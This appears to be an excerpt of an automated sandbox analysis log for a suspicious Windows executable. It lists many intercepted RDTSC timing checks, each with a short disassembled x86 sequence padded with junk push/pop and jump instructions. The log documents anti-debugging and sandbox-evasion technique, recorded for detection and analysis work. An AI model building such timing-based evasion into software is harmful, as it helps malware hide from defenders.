Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658ACE second address: 1658B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F10C481811Ch 0x0000000f popad 0x00000010 jbe 00007F10C4818123h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F10C481811Bh 0x0000001d popad 0x0000001e pushad 0x0000001f jbe 00007F10C481812Bh 0x00000025 jmp 00007F10C4818125h 0x0000002a jmp 00007F10C4818127h 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658B2F second address: 1658B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658C81 second address: 1658C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658C89 second address: 1658C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4816DFEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658C9B second address: 1658CA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658CA1 second address: 1658CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658CA7 second address: 1658CC0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F10C4818121h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658CC0 second address: 1658CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658CC6 second address: 1658CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658CCA second address: 1658CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658CCE second address: 1658CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F10C481811Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658FDC second address: 1658FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jmp 00007F10C4816DFDh 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658FF1 second address: 1658FFB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F10C481811Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658FFB second address: 1659013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F10C4816DF8h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 jc 00007F10C4816DF6h 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1659013 second address: 1659019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1659019 second address: 1659035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4816E08h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16591A6 second address: 16591C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Bh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007F10C4818116h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165947D second address: 1659496 instructions: 0x00000000 rdtsc 0x00000002 je 00007F10C4816E0Bh 0x00000008 jmp 00007F10C4816DFFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16595C3 second address: 16595EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F10C4818124h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F10C4818122h 0x00000011 js 00007F10C4818116h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16595EB second address: 16595EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165990D second address: 1659913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1659913 second address: 1659917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1659A35 second address: 1659A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 je 00007F10C481811Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1659A4E second address: 1659A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1659A52 second address: 1659A6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818129h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16066D1 second address: 16066D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16066D5 second address: 16066D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16586F3 second address: 16586FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16586FC second address: 1658717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4818127h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658717 second address: 1658767 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F10C4816DFDh 0x0000000f jmp 00007F10C4816E08h 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 push edx 0x0000001a pop edx 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e je 00007F10C4816DF6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658767 second address: 1658779 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Ch 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658779 second address: 1658789 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F10C4816E02h 0x00000008 jnl 00007F10C4816DF6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1658789 second address: 165879B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jns 00007F10C4818116h 0x0000000c jc 00007F10C4818116h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165879B second address: 16587A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165F8C2 second address: 165F8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165F8C6 second address: 165F943 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F10C4816E05h 0x00000010 jo 00007F10C4816DF6h 0x00000016 jmp 00007F10C4816E06h 0x0000001b popad 0x0000001c jne 00007F10C4816DFEh 0x00000022 jmp 00007F10C4816E05h 0x00000027 popad 0x00000028 jo 00007F10C4816E14h 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 jmp 00007F10C4816E02h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165E764 second address: 165E776 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F10C481811Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161EF83 second address: 161EF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161EF8B second address: 161EF9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jng 00007F10C481811Eh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161EF9C second address: 161F00F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 mov dx, 4F1Fh 0x0000000a jo 00007F10C4816E0Fh 0x00000010 jmp 00007F10C4816E09h 0x00000015 lea eax, dword ptr [ebp+12480C7Bh] 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007F10C4816DF8h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 mov edx, dword ptr [ebp+122D2D64h] 0x0000003b nop 0x0000003c jmp 00007F10C4816E08h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push edi 0x00000045 push edi 0x00000046 pop edi 0x00000047 pop edi 0x00000048 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161F00F second address: 161F015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161F0CF second address: 161F0E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C4816DFEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161F629 second address: 161F62D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161F62D second address: 161F631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161F631 second address: 161F637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 161FADC second address: 161FAFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b js 00007F10C4816E02h 0x00000011 jng 00007F10C4816DFCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 162038C second address: 1620390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1620390 second address: 16066D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007F10C4816E02h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F10C4816DF8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 or dword ptr [ebp+122D29F5h], edi 0x0000002e mov edx, dword ptr [ebp+122D33D6h] 0x00000034 call dword ptr [ebp+124594CCh] 0x0000003a jg 00007F10C4816E19h 0x00000040 pushad 0x00000041 push ebx 0x00000042 pop ebx 0x00000043 push esi 0x00000044 pop esi 0x00000045 popad 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F10C4816DFBh 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165EACB second address: 165EAD0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165EC56 second address: 165EC79 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F10C4816DFAh 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jp 00007F10C4816DFCh 0x00000012 js 00007F10C4816DF6h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jc 00007F10C4816E0Dh 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 165EDCD second address: 165EDD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166502E second address: 1665037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1665037 second address: 166503B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166503B second address: 1665058 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFFh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F10C4816E02h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1665058 second address: 1665075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F10C4818116h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F10C4818120h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1663C9A second address: 1663C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1663E0F second address: 1663E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F10C4818116h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16642C8 second address: 16642D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F10C4816DF6h 0x0000000a je 00007F10C4816DF6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1664411 second address: 166441C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F10C4818116h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166472C second address: 166474A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F10C4816DF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F10C4816E00h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166474A second address: 166474E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166474E second address: 1664754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16682E0 second address: 16682E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16682E6 second address: 16682F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16682F7 second address: 1668301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166A691 second address: 166A695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166A353 second address: 166A357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166A357 second address: 166A387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F10C4816DF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F10C4816E14h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166A387 second address: 166A38D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166A38D second address: 166A391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166D4B4 second address: 166D4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166D4BA second address: 166D4C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F10C4816DF6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166D4C5 second address: 166D4D4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F10C4818118h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166CFED second address: 166CFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 js 00007F10C4816DF6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166CFFC second address: 166D009 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F10C4818116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166D009 second address: 166D00F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166D25F second address: 166D263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166D263 second address: 166D283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F10C4816E07h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 166D283 second address: 166D287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1670973 second address: 1670995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jc 00007F10C4816DF6h 0x0000000d popad 0x0000000e js 00007F10C4816DFCh 0x00000014 jno 00007F10C4816DF6h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pushad 0x00000020 popad 0x00000021 pop ecx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16759E8 second address: 16759EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16759EC second address: 16759F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F10C4816DF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16759F8 second address: 16759FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16759FE second address: 1675A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1674F00 second address: 1674F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1674F06 second address: 1674F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16752BB second address: 16752C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16752C1 second address: 16752CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16752CA second address: 1675327 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F10C481811Bh 0x00000008 jmp 00007F10C4818128h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F10C4818123h 0x00000016 pop eax 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d jc 00007F10C4818116h 0x00000023 pushad 0x00000024 popad 0x00000025 je 00007F10C4818116h 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e ja 00007F10C4818116h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1675327 second address: 167532B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1675499 second address: 16754A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jc 00007F10C4818116h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1679F8A second address: 1679F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
